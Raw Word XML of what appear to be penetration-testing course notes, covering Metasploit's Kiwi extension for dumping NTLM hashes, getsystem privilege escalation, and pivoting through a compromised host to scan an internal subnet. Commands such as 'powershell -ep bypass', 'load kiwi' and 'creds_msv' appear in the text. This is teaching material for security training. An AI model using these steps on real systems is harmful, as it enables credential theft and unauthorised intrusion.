      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Import-Module NtObjectManager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NtTokenIntegrityLevel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000056F">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3708400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53" name="image42.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image42.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124"/>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570">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000571">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiwi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000572">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000573">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Besides being able to background an active session and execute modules through it, we can also load extensions directly inside the active session with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">load</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000574">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One great example of this is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a Meterpreter extension providing the capabilities of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because Mimikatz requires SYSTEM rights, let's exit the current Meterpreter session, start the listener again, execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the bind shell, and enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000575">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3136900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="286" name="image279.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image279.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12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576">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000577">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let's enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">load</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as argument to load the Kiwi module. Then, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display the commands of the Kiwi module. Finally, we'll use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds_msv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to retrieve</w:t>
      </w:r>
      <w:hyperlink r:id="rId126">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId127">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:hyperlink r:id="rId128">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId129">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NTLM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000578">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000579">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000057A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5321332" cy="6719888"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="430" name="image422.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image422.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5321332" cy="6719888"/>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="561" name="image540.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image540.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId131"/>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57C">
      <w:pPr>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 xml:space="preserve">Listing 73 shows that we could successfully retrieve the NTLM hash of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000057E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000057F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000580">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ry7a9yveemk4" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivoting with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000581">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (21.3.3. Pivoting with Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000582">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000583">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ability to pivot to another target or network is a vital skill for every penetration tester. In Port Redirection and Pivoting, we learned various techniques to perform pivoting. Instead of using these techniques manually, we can also use Metasploit to perform them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000584">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000585">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As in the previous sections, we'll connect to the bind shell on port 4444 on the machine ITWK01. Let's assume we are currently gathering information on the target. In this step, we'll identify a second network interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000586">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000587">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000588">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3900488" cy="3540443"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77" name="image72.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image72.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId132"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3900488" cy="3540443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000589">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000058A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 74 shows that the second interface has the assigned IP 172.16.5.199. We can try to identify other live hosts on this second network by leveraging methods from active information gathering. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000058B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000058C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have a working session on the compromised system, we can background it. To add a route to a network reachable through a compromised host, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the network information and session ID that the route applies to. After adding the route, we can display the current routes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000058D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000058E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3814437" cy="2414588"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="414" name="image395.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image395.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId133"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3814437"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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With a path created to the internal network, we can enumerate this subnet. Now we could scan the whole network for live hosts with a port scan auxiliary module. Since this scan would take quite some time to complete, let's shorten this step by only scanning the other live host in the second network. Therefore, instead of setting the value of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we would do if we wanted to scan the whole network, we set it to 172.16.5.200. For now, we only want to scan ports 445 and 3389.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000590">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4633578" cy="2710346"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="235" name="image248.png"/>
            <a:graphic>
